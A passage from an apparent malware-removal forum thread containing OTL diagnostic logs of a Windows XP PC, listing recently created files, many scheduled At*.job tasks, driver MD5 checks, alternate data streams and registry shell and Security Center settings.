    [2010/12/05 14:46:14 | 000,000,236 | ---- | M] () -- C:\WINDOWS\tasks\OGALogon.job
    [2010/12/05 14:46:08 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
    [2010/12/05 13:58:50 | 000,000,428 | ---- | M] () -- C:\WINDOWS\tasks\At5.job
    [2010/12/05 13:56:05 | 002,160,272 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
    [2010/12/05 13:53:46 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
    [2010/12/04 17:21:36 | 000,497,050 | ---- | M] () -- C:\WINDOWS\System32\drivers\Cat.DB
    [2010/12/04 15:37:06 | 000,240,592 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb1.bin
    [2010/12/04 15:37:06 | 000,000,001 | ---- | M] () -- C:\WINDOWS\System32\nvdrssel.bin
    [2010/12/04 15:37:02 | 000,240,592 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb0.bin
    [2010/12/01 14:39:34 | 000,000,288 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf
    [2010/12/01 14:36:02 | 000,316,640 | ---- | M] () -- C:\WINDOWS\WMSysPr9.prx
    [2010/12/01 14:36:00 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb
    [2010/12/01 14:36:00 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb
    [2010/12/01 14:35:47 | 000,004,161 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI
    [2010/12/01 14:33:25 | 000,022,720 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat
    [2010/12/01 14:32:06 | 000,000,211 | -HS- | M] () -- C:\boot.ini
    [2010/11/30 07:57:06 | 000,008,141 | ---- | M] () -- C:\WINDOWS\System32\5123.js
    [2010/11/30 07:37:03 | 000,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    [2010/11/29 17:42:18 | 000,038,224 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
    [2010/11/29 17:42:06 | 000,020,952 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
    [2010/11/28 22:21:28 | 000,000,069 | ---- | M] () -- C:\WINDOWS\NeroDigital.ini
    [2010/11/28 22:07:38 | 000,032,768 | ---- | M] () -- C:\Documents and Settings\Marshall\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    [2010/11/27 13:05:11 | 000,000,605 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\Microsoft\Internet Explorer\Quick Launch\Game Booster.lnk
    [2010/11/25 23:01:01 | 000,000,292 | ---- | M] () -- C:\WINDOWS\tasks\RealUpgradeScheduledTaskS-1-5-21-1202660629-1500820517-682003330-1003.job
    [2010/11/23 16:31:14 | 000,022,328 | ---- | M] () -- C:\WINDOWS\System32\drivers\PnkBstrK.sys
    [2010/11/23 16:31:14 | 000,022,328 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\PnkBstrK.sys
    [2010/11/23 16:30:53 | 000,669,184 | ---- | M] () -- C:\WINDOWS\System32\pbsvc.exe
    [2010/11/23 15:49:57 | 000,001,480 | ---- | M] () -- C:\WINDOWS\System32\ealregsnapshot1.reg
    [2010/11/17 20:37:08 | 000,001,597 | ---- | M] () -- C:\Documents and Settings\Marshall\Application Data\MPQEditor.ini
    [2010/11/17 16:05:38 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
    [2010/11/09 16:02:10 | 000,000,056 | -H-- | M] () -- C:\WINDOWS\System32\ezsidmv.dat
    [9 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
    [3 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

    ========== Files Created - No Company Name ==========

    [2010/12/05 11:39:12 | 000,001,374 | ---- | C] () -- C:\WINDOWS\imsins.BAK
    [2010/12/04 17:21:30 | 000,497,050 | ---- | C] () -- C:\WINDOWS\System32\drivers\Cat.DB
    [2010/12/01 14:37:37 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\pintlcsa.dll
    [2010/12/01 14:37:19 | 001,158,818 | ---- | C] () -- C:\WINDOWS\System32\dllcache\korwbrkr.lex
    [2010/12/01 14:37:14 | 000,059,392 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imscinst.exe
    [2010/12/01 14:37:13 | 000,196,665 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imjpinst.exe
    [2010/12/01 14:37:11 | 000,134,339 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imekr.lex
    [2010/12/01 14:37:04 | 013,463,552 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hwxjpn.dll
    [2010/12/01 14:37:00 | 000,108,827 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hanja.lex
    [2010/12/01 14:36:57 | 000,094,208 | ---- | C] () -- C:\WINDOWS\System32\dllcache\fpencode.dll
    [2010/12/01 14:36:45 | 000,173,568 | ---- | C] () -- C:\WINDOWS\System32\dllcache\chtskf.dll
    [2010/12/01 13:46:45 | 000,141,702 | ---- | C] () -- C:\WINDOWS\System32\dllcache\netfx.cat
    [2010/12/01 13:46:45 | 000,110,116 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tabletpc.cat
    [2010/12/01 13:46:45 | 000,037,484 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MW770.CAT
    [2010/12/01 13:46:45 | 000,031,965 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mediactr.cat
    [2010/12/01 13:46:45 | 000,024,209 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msn7.cat
    [2010/12/01 13:46:45 | 000,013,472 | ---- | C] () -- C:\WINDOWS\System32\dllcache\HPCRDP.CAT
    [2010/12/01 13:46:45 | 000,011,651 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msn9.cat
    [2010/12/01 13:46:45 | 000,008,574 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IASNT4.CAT
    [2010/12/01 13:46:45 | 000,007,382 | ---- | C] () -- C:\WINDOWS\System32\dllcache\OEMBIOS.CAT
    [2010/12/01 13:46:45 | 000,007,245 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSTSWEB.CAT
    [2010/12/01 13:46:44 | 002,012,670 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5.CAT
    [2010/12/01 13:46:44 | 001,042,903 | ---- | C] () -- C:\WINDOWS\System32\dllcache\SP2.CAT
    [2010/12/01 13:46:44 | 000,797,189 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5IIS.CAT
    [2010/12/01 13:46:44 | 000,502,724 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5INF.CAT
    [2010/12/01 13:46:44 | 000,399,645 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MAPIMIG.CAT
    [2010/12/01 13:46:44 | 000,031,281 | ---- | C] () -- C:\WINDOWS\System32\dllcache\FP4.CAT
    [2010/12/01 13:46:44 | 000,013,753 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IMS.CAT
    [2010/12/01 13:46:44 | 000,009,581 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSMSGS.CAT
    [2010/11/30 07:57:06 | 000,008,141 | ---- | C] () -- C:\WINDOWS\System32\5123.js
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At9.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At8.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At7.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At24.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At23.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At22.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At21.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At20.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At19.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At18.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At17.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At16.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At15.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At14.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At13.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At12.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At11.job
    [2010/11/27 13:07:32 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At10.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At6.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At5.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At4.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At3.job
    [2010/11/27 13:07:31 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At2.job
    [2010/11/27 13:07:29 | 000,000,428 | ---- | C] () -- C:\WINDOWS\tasks\At1.job
    [2010/11/27 13:05:11 | 000,000,605 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\Microsoft\Internet Explorer\Quick Launch\Game Booster.lnk
    [2010/11/17 16:05:38 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
    [2010/11/12 17:29:50 | 000,001,480 | ---- | C] () -- C:\WINDOWS\System32\ealregsnapshot1.reg
    [2010/11/12 17:20:19 | 000,022,328 | ---- | C] () -- C:\WINDOWS\System32\drivers\PnkBstrK.sys
    [2010/11/12 17:20:19 | 000,022,328 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\PnkBstrK.sys
    [2010/11/12 17:20:02 | 000,103,736 | ---- | C] () -- C:\WINDOWS\System32\PnkBstrB.exe
    [2010/11/12 17:20:01 | 000,669,184 | ---- | C] () -- C:\WINDOWS\System32\pbsvc.exe
    [2010/11/12 17:20:01 | 000,066,872 | ---- | C] () -- C:\WINDOWS\System32\PnkBstrA.exe
    [2010/11/09 16:02:10 | 000,000,056 | -H-- | C] () -- C:\WINDOWS\System32\ezsidmv.dat
    [2010/11/01 20:25:23 | 000,000,328 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\ICARE_ACTIVITY.LOG
    [2010/09/29 17:22:36 | 000,021,840 | ---- | C] () -- C:\WINDOWS\System32\SIntfNT.dll
    [2010/09/29 17:22:36 | 000,017,212 | ---- | C] () -- C:\WINDOWS\System32\SIntf32.dll
    [2010/09/29 17:22:36 | 000,012,067 | ---- | C] () -- C:\WINDOWS\System32\SIntf16.dll
    [2010/09/26 18:51:55 | 000,000,262 | ---- | C] () -- C:\WINDOWS\{789289CA-F73A-4A16-A331-54D498CE069F}_WiseFW.ini
    [2010/09/06 19:33:38 | 000,001,597 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\MPQEditor.ini
    [2010/07/22 23:37:03 | 000,032,768 | ---- | C] () -- C:\Documents and Settings\Marshall\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    [2010/07/14 23:37:22 | 000,000,069 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
    [2010/07/14 23:35:43 | 000,165,376 | ---- | C] () -- C:\WINDOWS\System32\unrar.dll
    [2010/07/14 23:35:43 | 000,000,038 | ---- | C] () -- C:\WINDOWS\avisplitter.ini
    [2010/07/14 23:35:42 | 000,881,664 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
    [2010/07/14 23:35:42 | 000,205,824 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll
    [2010/07/14 23:35:40 | 000,085,504 | ---- | C] () -- C:\WINDOWS\System32\ff_vfw.dll
    [2010/07/14 20:10:01 | 001,584,149 | ---- | C] () -- C:\WINDOWS\System32\setupapinew.dll
    [2010/07/14 20:10:01 | 000,789,525 | ---- | C] () -- C:\WINDOWS\System32\rpcrt4new.dll
    [2010/07/14 20:10:01 | 000,633,871 | ---- | C] () -- C:\WINDOWS\System32\user32new.dll
    [2010/07/14 20:10:01 | 000,134,671 | ---- | C] () -- C:\WINDOWS\System32\winstanew.dll
    [2010/07/14 20:10:01 | 000,096,783 | ---- | C] () -- C:\WINDOWS\System32\powrprofnew.dll
    [2010/07/14 20:10:01 | 000,087,558 | ---- | C] () -- C:\WINDOWS\System32\ntdsapinew.dll
    [2010/07/14 20:10:01 | 000,072,707 | ---- | C] () -- C:\WINDOWS\System32\secur32new.dll
    [2010/07/14 20:10:01 | 000,025,037 | ---- | C] () -- C:\WINDOWS\System32\Nucleus.dll
    [2010/07/14 20:10:01 | 000,000,236 | -H-- | C] () -- C:\Program Files\Common Files\dx.reg
    [2010/07/14 20:10:00 | 000,874,502 | ---- | C] () -- C:\WINDOWS\System32\kernel32new.dll
    [2010/07/14 20:10:00 | 000,681,478 | ---- | C] () -- C:\WINDOWS\System32\msvcrtnew.dll
    [2010/07/14 20:10:00 | 000,376,832 | ---- | C] () -- C:\WINDOWS\System32\M2000Twn.dll
    [2010/07/14 20:10:00 | 000,167,948 | ---- | C] () -- C:\WINDOWS\System32\dxgi.dll
    [2010/07/14 20:10:00 | 000,039,948 | ---- | C] () -- C:\WINDOWS\System32\dwmapi.dll
    [2010/07/14 20:09:59 | 001,029,126 | ---- | C] () -- C:\WINDOWS\System32\d3d10.dll
    [2010/07/14 20:09:59 | 000,974,354 | ---- | C] () -- C:\WINDOWS\System32\crypt32new.dll
    [2010/07/14 20:09:59 | 000,770,069 | ---- | C] () -- C:\WINDOWS\System32\advapi32new.dll
    [2010/07/14 20:09:59 | 000,187,398 | ---- | C] () -- C:\WINDOWS\System32\d3d10core.dll
    [2010/07/14 20:09:59 | 000,171,023 | ---- | C] () -- C:\WINDOWS\System32\apphelpnew.dll
    [2010/07/14 18:12:40 | 000,000,760 | ---- | C] () -- C:\Documents and Settings\Marshall\Application Data\setup_ldm.iss
    [2010/07/14 03:55:03 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
    [2010/04/02 18:17:34 | 000,179,091 | ---- | C] () -- C:\WINDOWS\System32\xlive.dll.cat
    [2009/08/03 15:07:42 | 000,403,816 | ---- | C] () -- C:\WINDOWS\System32\OGACheckControl.dll
    [2004/08/04 23:00:00 | 000,027,440 | ---- | C] () -- C:\WINDOWS\System32\drivers\secdrv.sys

    ========== LOP Check ==========

    [2010/07/25 11:51:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Lite
    [2010/07/25 12:33:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Pro
    [2010/10/24 14:07:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IObit
    [2010/08/21 13:15:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\LightScribe
    [2010/12/04 17:31:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
    [2010/12/04 16:31:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PMB Files
    [2010/10/23 13:41:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Sony
    [2010/12/04 17:28:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
    [2010/11/27 13:09:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TuneUp Software
    [2010/09/28 00:30:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Ubisoft
    [2010/12/04 15:12:50 | 000,000,000 | -H-D | M] -- C:\Documents and Settings\All Users\Application Data\{0151C9FC-719D-4459-B1E2-4685CC6E62A8}
    [2010/11/27 13:07:11 | 000,000,000 | -HSD | M] -- C:\Documents and Settings\All Users\Application Data\{24036256-BFDB-4CD3-BE8A-A3D6160F2E16}
    [2010/07/16 17:37:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
    [2010/07/14 20:52:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
    [2010/07/30 20:52:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\AnvSoft
    [2010/07/25 12:52:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\DAEMON Tools Lite
    [2010/07/25 12:33:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\DAEMON Tools Pro
    [2010/08/20 14:39:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\fltk.org
    [2010/10/24 14:05:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\IObit
    [2010/10/21 23:06:53 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\JLC's Software
    [2010/07/14 18:12:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Leadertech
    [2010/11/01 21:08:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\LolClient
    [2010/07/14 19:25:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\OpenOffice.org
    [2010/10/23 13:56:13 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Publish Providers
    [2010/10/23 13:56:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Sony
    [2010/10/20 17:35:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Subversion
    [2010/11/27 13:10:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\TuneUp Software
    [2010/09/28 00:30:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Ubisoft
    [2010/09/29 18:39:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Marshall\Application Data\Xilisoft Corporation
    [2010/12/06 04:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At1.job
    [2010/12/06 10:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At10.job
    [2010/12/05 14:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At11.job
    [2010/12/06 09:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At12.job
    [2010/12/05 16:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At13.job
    [2010/12/05 22:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At14.job
    [2010/12/06 06:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At15.job
    [2010/12/05 21:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At16.job
    [2010/12/06 00:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At17.job
    [2010/12/06 01:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At18.job
    [2010/12/06 08:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At19.job
    [2010/12/06 11:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At2.job
    [2010/12/05 23:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At20.job
    [2010/12/06 05:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At21.job
    [2010/12/05 20:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At22.job
    [2010/12/05 15:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At23.job
    [2010/12/06 07:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At24.job
    [2010/12/05 17:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At3.job
    [2010/12/05 19:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At4.job
    [2010/12/05 13:58:50 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At5.job
    [2010/12/06 12:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At6.job
    [2010/12/06 02:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At7.job
    [2010/12/05 18:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At8.job
    [2010/12/06 03:57:00 | 000,000,428 | ---- | M] () -- C:\WINDOWS\Tasks\At9.job
    [2010/12/05 14:46:14 | 000,000,236 | ---- | M] () -- C:\WINDOWS\Tasks\OGALogon.job

    ========== Purity Check ==========



    ========== Custom Scans ==========


    < %SYSTEMDRIVE%\*.exe >
    [2007/11/07 09:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe


    < MD5 for: AGP440.SYS >
    [2004/08/04 23:00:00 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
    [2008/04/14 05:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\agp440.sys
    [2004/08/04 23:00:00 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\system32\drivers\agp440.sys

    < MD5 for: ATAPI.SYS >
    [2004/08/04 23:00:00 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
    [2008/04/14 05:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\atapi.sys
    [2004/08/04 23:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\drivers\atapi.sys

    < MD5 for: EVENTLOG.DLL >
    [2008/04/14 11:11:53 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\eventlog.dll
    [2004/08/04 23:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\system32\dllcache\eventlog.dll
    [2004/08/04 23:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\system32\eventlog.dll

    < MD5 for: NETLOGON.DLL >
    [2008/04/14 11:12:01 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB968389\SP2QFE\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB975467\SP2QFE\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\SoftwareDistribution\Download\78cf8552430e25a8f24bc1e4dfb1970e\sp2qfe\netlogon.dll
    [2009/02/07 05:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\SoftwareDistribution\Download\de81b460c3abcfc5b8494c785a5f3944\sp2qfe\netlogon.dll
    [2004/08/04 23:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\system32\dllcache\netlogon.dll
    [2004/08/04 23:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\system32\netlogon.dll

    < MD5 for: SCECLI.DLL >
    [2004/08/04 23:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\system32\dllcache\scecli.dll
    [2004/08/04 23:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\system32\scecli.dll
    [2008/04/14 11:12:05 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\SoftwareDistribution\Download\9866fb57abdc0ea2f5d4e132d055ba4e\scecli.dll

    < %systemroot%\*. /mp /s >

    < %systemroot%\system32\*.dll /lockedfiles >
    [3 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

    < %systemroot%\System32\config\*.sav >
    [2010/12/02 00:28:57 | 000,524,288 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
    [2010/11/30 08:00:15 | 000,262,144 | ---- | M] () -- C:\WINDOWS\system32\config\security.sav
    [2010/12/02 00:28:57 | 044,564,480 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
    [2010/12/02 00:28:57 | 006,029,312 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav

    ========== Alternate Data Streams ==========

    @Alternate Data Stream - 147 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:DFC5A2B2
    @Alternate Data Stream - 109 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:A8ADE5D8
    @Alternate Data Stream - 102 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:430C6D84

    < End of report >
     
  18. 2010/12/05
    Cosmic Jester
    OTL Extras logfile created on: 6/12/2010 12:47:58 PM - Run 1
    OTL by OldTimer - Version 3.2.17.3 Folder = C:\FIX THIS PC\BBS\OTL
    Windows XP Professional Edition Service Pack 2 (Version = 5.1.2600) - Type = NTWorkstation
    Internet Explorer (Version = 6.0.2900.2180)
    Locale: 00000C09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy

    2.00 Gb Total Physical Memory | 1.00 Gb Available Physical Memory | 51.00% Memory free
    4.00 Gb Paging File | 3.00 Gb Available in Paging File | 80.00% Paging File free
    Paging file location(s): c:\pagefile.sys 2046 4092 [binary data]

    %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
    Drive C: | 232.88 Gb Total Space | 95.97 Gb Free Space | 41.21% Space Free | Partition Type: NTFS
    Drive E: | 0.38 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

    Computer Name: MARSHALL-D40729 | User Name: Marshall | Logged in as Administrator.
    Boot Mode: Normal | Scan Mode: Current user | Quick Scan
    Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

    ========== Extra Registry (SafeList) ==========


    ========== File Associations ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

    [HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
    .html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

    ========== Shell Spawning ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
    batfile [open] -- "%1" %*
    cmdfile [open] -- "%1" %*
    comfile [open] -- "%1" %*
    exefile [open] -- "%1" %*
    http [open] -- Reg Error: Key error.
    https [open] -- Reg Error: Key error.
    piffile [open] -- "%1" %*
    regfile [merge] -- Reg Error: Key error.
    scrfile [config] -- "%1 "
    scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
    scrfile [open] -- "%1" /S
    txtfile [edit] -- Reg Error: Key error.
    Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
    Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
    Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
    Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
    Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

    ========== Security Center Settings ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
    "FirstRunDisabled" = 1
    "AntiVirusDisableNotify" = 0
    "FirewallDisableNotify" = 0
    "UpdatesDisableNotify" = 0
